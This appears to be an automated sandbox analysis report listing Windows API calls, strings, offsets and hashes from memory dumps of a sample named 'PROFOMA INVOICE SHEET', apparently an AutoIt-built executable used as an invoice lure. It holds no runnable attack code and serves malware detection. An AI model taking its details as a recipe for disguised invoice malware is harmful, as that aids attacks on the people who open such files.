                                    • SetTextColor.GDI32(?,?), ref: 00397425
                                    • GetSysColorBrush.USER32(0000000F), ref: 0039743B
                                    • GetSysColor.USER32(0000000F), ref: 00397446
                                    • CreateSolidBrush.GDI32(?), ref: 0039744B
                                    • GetSysColor.USER32(00000011), ref: 00397463
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00397471
                                    • SelectObject.GDI32(?,00000000), ref: 00397482
                                    • SetBkColor.GDI32(?,00000000), ref: 0039748B
                                    • SelectObject.GDI32(?,?), ref: 00397498
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003974B7
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003974CE
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003974DB
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039752A
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00397554
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00397572
                                    • DrawFocusRect.USER32(?,?), ref: 0039757D
                                    • GetSysColor.USER32(00000011), ref: 0039758E
                                    • SetTextColor.GDI32(?,00000000), ref: 00397596
                                    • DrawTextW.USER32(?,003970F5,000000FF,?,00000000), ref: 003975A8
                                    • SelectObject.GDI32(?,?), ref: 003975BF
                                    • DeleteObject.GDI32(?), ref: 003975CA
                                    • SelectObject.GDI32(?,?), ref: 003975D0
                                    • DeleteObject.GDI32(?), ref: 003975D5
                                    • SetTextColor.GDI32(?,?), ref: 003975DB
                                    • SetBkColor.GDI32(?,?), ref: 003975E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: 8861d8c7bf9d9e20e4bf1920614eb895ad18051906a9465e124d32ae33897cbd
                                    • Instruction ID: 1c470c1f6956862cdc7300d6ca06c7cbd7226dee134a6007022a57f9ef20db4f
                                    • Opcode Fuzzy Hash: 8861d8c7bf9d9e20e4bf1920614eb895ad18051906a9465e124d32ae33897cbd
                                    • Instruction Fuzzy Hash: 72616C72910218AFDF029FA4DC49EEEBFB9EB09320F115116F915AB2E1D7719940CFA0
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00391128
                                    • GetDesktopWindow.USER32 ref: 0039113D
                                    • GetWindowRect.USER32(00000000), ref: 00391144
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00391199
                                    • DestroyWindow.USER32(?), ref: 003911B9
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003911ED
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039120B
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039121D
                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00391232
                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00391245
                                    • IsWindowVisible.USER32(00000000), ref: 003912A1
                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003912BC
                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003912D0
                                    • GetWindowRect.USER32(00000000,?), ref: 003912E8
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0039130E
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00391328
                                    • CopyRect.USER32(?,?), ref: 0039133F
                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 003913AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: f6287c2272f75661738c20343c68ef0a3de630e506beaeda8eca43feb332ea31
                                    • Instruction ID: 77378565e1f9b4088d4cbf6cab0ac1159feda0fcba46904cd911d2d274687781
                                    • Opcode Fuzzy Hash: f6287c2272f75661738c20343c68ef0a3de630e506beaeda8eca43feb332ea31
                                    • Instruction Fuzzy Hash: FAB18C71608341AFDB11DF64C884B6AFBE4FF88354F008919F999AB2A1CB71EC44CB91
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00318968
                                    • GetSystemMetrics.USER32(00000007), ref: 00318970
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031899B
                                    • GetSystemMetrics.USER32(00000008), ref: 003189A3
                                    • GetSystemMetrics.USER32(00000004), ref: 003189C8
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003189E5
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003189F5
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00318A28
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00318A3C
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00318A5A
                                    • GetStockObject.GDI32(00000011), ref: 00318A76
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00318A81
                                      • Part of subcall function 0031912D: GetCursorPos.USER32(?), ref: 00319141
                                      • Part of subcall function 0031912D: ScreenToClient.USER32(00000000,?), ref: 0031915E
                                      • Part of subcall function 0031912D: GetAsyncKeyState.USER32(00000001), ref: 00319183
                                      • Part of subcall function 0031912D: GetAsyncKeyState.USER32(00000002), ref: 0031919D
                                    • SetTimer.USER32(00000000,00000000,00000028,003190FC), ref: 00318AA8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: e805f9a43e52be58a6bd2439b3a3065a02c3203de75386a13e5dc8a5d58ef6e2
                                    • Instruction ID: c0829a0bace7fdd2a684fe16696bbf02462ac18214f755ccd2c288704be61753
                                    • Opcode Fuzzy Hash: e805f9a43e52be58a6bd2439b3a3065a02c3203de75386a13e5dc8a5d58ef6e2
                                    • Instruction Fuzzy Hash: EBB16075A00209AFDB16DFA8DC55BEE7BB9FB48315F11421AFA1597290DB30D840CB54
                                    APIs
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                      • Part of subcall function 003610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                      • Part of subcall function 003610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                      • Part of subcall function 003610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00360DF5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00360E29
                                    • GetLengthSid.ADVAPI32(?), ref: 00360E40
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00360E7A
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00360E96
                                    • GetLengthSid.ADVAPI32(?), ref: 00360EAD
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00360EB5
                                    • HeapAlloc.KERNEL32(00000000), ref: 00360EBC
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00360EDD
                                    • CopySid.ADVAPI32(00000000), ref: 00360EE4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00360F13
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00360F35
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00360F47
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F6E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F75
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F7E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F85
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F8E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F95
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00360FA1
                                    • HeapFree.KERNEL32(00000000), ref: 00360FA8
                                      • Part of subcall function 00361193: GetProcessHeap.KERNEL32(00000008,00360BB1,?,00000000,?,00360BB1,?), ref: 003611A1
                                      • Part of subcall function 00361193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00360BB1,?), ref: 003611A8
                                      • Part of subcall function 00361193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00360BB1,?), ref: 003611B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: f513dd4abb4a021583b6240d5a8207ac6f51b34e9b5a1ff3bfacac2344f96ac4
                                    • Instruction ID: 48f5c301536ba15b6827a2c666edd36e1cb53277bbc53b19544ec0275afa5cbc
                                    • Opcode Fuzzy Hash: f513dd4abb4a021583b6240d5a8207ac6f51b34e9b5a1ff3bfacac2344f96ac4
                                    • Instruction Fuzzy Hash: D4715B7290021AEBDF26DFA4DC49FAFBBBCBF05300F058115F919AA295D7729905CB60
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038C4BD
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0039CC08,00000000,?,00000000,?,?), ref: 0038C544
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0038C5A4
                                    • _wcslen.LIBCMT ref: 0038C5F4
                                    • _wcslen.LIBCMT ref: 0038C66F
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0038C6B2
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0038C7C1
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0038C84D
                                    • RegCloseKey.ADVAPI32(?), ref: 0038C881
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038C88E
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0038C960
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 9721498-966354055
                                    • Opcode ID: 104530847d359d5a9f7b57b811441639910b470d3a033433318794fdd2b7b5ab
                                    • Instruction ID: bbf154ea776239f5da296eb3553acde7af0ec9da74f8c67b896494ab280940b4
                                    • Opcode Fuzzy Hash: 104530847d359d5a9f7b57b811441639910b470d3a033433318794fdd2b7b5ab
                                    • Instruction Fuzzy Hash: 26127A356143019FDB16EF14C891A2AB7E5EF89714F05889DF88A9B3A2DB31FC41CB91
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 003909C6
                                    • _wcslen.LIBCMT ref: 00390A01
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00390A54
                                    • _wcslen.LIBCMT ref: 00390A8A
                                    • _wcslen.LIBCMT ref: 00390B06
                                    • _wcslen.LIBCMT ref: 00390B81
                                      • Part of subcall function 0031F9F2: _wcslen.LIBCMT ref: 0031F9FD
                                      • Part of subcall function 00362BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00362BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 1103490817-4258414348
                                    • Opcode ID: 0ecbf6bc387b5973061b1a3acfe34f7d334c44562696f1dbd9ee2ada5ee56b1d
                                    • Instruction ID: ab19c8432f3b1d2c58ab62350f9a16a11cca99d33e4fe8ca9001dec29e3998a9
                                    • Opcode Fuzzy Hash: 0ecbf6bc387b5973061b1a3acfe34f7d334c44562696f1dbd9ee2ada5ee56b1d
                                    • Instruction Fuzzy Hash: BEE1CF362087018FCB1AEF28C45096AB7E5FF98314F15895CF8969B7A2DB31ED45CB81
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 1256254125-909552448
                                    • Opcode ID: 2566e5c24cbe75e48517b41eab3b8953b2d7b1e0a28844b124c327f436dcf889
                                    • Instruction ID: 8004eed8ec49ad1b221acb3e3a3c6b0238aaff5a9bbd4f270c471fa09927fda7
                                    • Opcode Fuzzy Hash: 2566e5c24cbe75e48517b41eab3b8953b2d7b1e0a28844b124c327f436dcf889
                                    • Instruction Fuzzy Hash: 0671193262062A8BCB17FE7CD8516BB33A5AF60750F1211A9FC659B284E735CD45C7B0
                                    APIs
                                    • _wcslen.LIBCMT ref: 0039835A
                                    • _wcslen.LIBCMT ref: 0039836E
                                    • _wcslen.LIBCMT ref: 00398391
                                    • _wcslen.LIBCMT ref: 003983B4
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003983F2
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0039361A,?), ref: 0039844E
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00398487
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003984CA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00398501
                                    • FreeLibrary.KERNEL32(?), ref: 0039850D
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039851D
                                    • DestroyIcon.USER32(?), ref: 0039852C
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00398549
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00398555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 799131459-1154884017
                                    • Opcode ID: c0717a206dffc67660ed922506bdccea835f538ff2ef4731c039486e0d3e7ab6
                                    • Instruction ID: 2313d3085b9b4c91c34bed3b6dc019ef1605e2793487c23f39d6f0273dee6a44
                                    • Opcode Fuzzy Hash: c0717a206dffc67660ed922506bdccea835f538ff2ef4731c039486e0d3e7ab6
                                    • Instruction Fuzzy Hash: 8261DF72500215BAEF16DF65DC81BFE77ACBF4AB21F10460AF815DA0D1DB74A990CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 0-1645009161
                                    • Opcode ID: 227fe3bc3998401c0ec199b0063d30944fbd70d08ce6047db42b8a723c2553d9
                                    • Instruction ID: e761dc2872966fbaceabfe5008d541e051849b3283133dcf1e23c4c7d9445ecd
                                    • Opcode Fuzzy Hash: 227fe3bc3998401c0ec199b0063d30944fbd70d08ce6047db42b8a723c2553d9
                                    • Instruction Fuzzy Hash: AA81ED71A06205BBDF23AF60DC52FBE3BA8AF54740F054025F805AE1D2EB71EA51C6A1
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 00365A2E
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00365A40
                                    • SetWindowTextW.USER32(?,?), ref: 00365A57
                                    • GetDlgItem.USER32(?,000003EA), ref: 00365A6C
                                    • SetWindowTextW.USER32(00000000,?), ref: 00365A72
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365A82
                                    • SetWindowTextW.USER32(00000000,?), ref: 00365A88
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00365AA9
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00365AC3
                                    • GetWindowRect.USER32(?,?), ref: 00365ACC
                                    • _wcslen.LIBCMT ref: 00365B33
                                    • SetWindowTextW.USER32(?,?), ref: 00365B6F
                                    • GetDesktopWindow.USER32 ref: 00365B75
                                    • GetWindowRect.USER32(00000000), ref: 00365B7C
                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00365BD3
                                    • GetClientRect.USER32(?,?), ref: 00365BE0
                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00365C05
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00365C2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                    • String ID:
                                    • API String ID: 895679908-0
                                    • Opcode ID: f47b9cd74c98f67d5b12dfdd9fbf94699ef5f3ea59358403156296b519051fca
                                    • Instruction ID: 97890782a75a04550bf6101cff38a2ec1c7bb691854abe420f20c395d2a8dadb
                                    • Opcode Fuzzy Hash: f47b9cd74c98f67d5b12dfdd9fbf94699ef5f3ea59358403156296b519051fca
                                    • Instruction Fuzzy Hash: D5718031900B09AFDB22DFA8CE85A6EBBF9FF48704F104529E142A75A4D775E944CF50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[<
                                    • API String ID: 176396367-3478203385
                                    • Opcode ID: 57fd8d86d176db6aa139387a894b0dca9496f79f78953031ca670bc22f8dcada
                                    • Instruction ID: 00955ee4994fff36316b7adfca90778dbe3993687d722a7782bfd01c603a55df
                                    • Opcode Fuzzy Hash: 57fd8d86d176db6aa139387a894b0dca9496f79f78953031ca670bc22f8dcada
                                    • Instruction Fuzzy Hash: 46E1F532A00626ABCB1BDF68C451BEEFBB4BF45710F25C119E556E7244DF30AE858790
                                    APIs
                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003200C6
                                      • Part of subcall function 003200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(003D070C,00000FA0,74BAA25B,?,?,?,?,003423B3,000000FF), ref: 0032011C
                                      • Part of subcall function 003200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003423B3,000000FF), ref: 00320127
                                      • Part of subcall function 003200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003423B3,000000FF), ref: 00320138
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0032014E
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0032015C
                                      • Part of subcall function 003200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0032016A
                                      • Part of subcall function 003200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00320195
                                      • Part of subcall function 003200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003201A0
                                    • ___scrt_fastfail.LIBCMT ref: 003200E7
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    Strings
                                    • InitializeConditionVariable, xrefs: 00320148
                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00320122
                                    • kernel32.dll, xrefs: 00320133
                                    • WakeAllConditionVariable, xrefs: 00320162
                                    • SleepConditionVariableCS, xrefs: 00320154
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
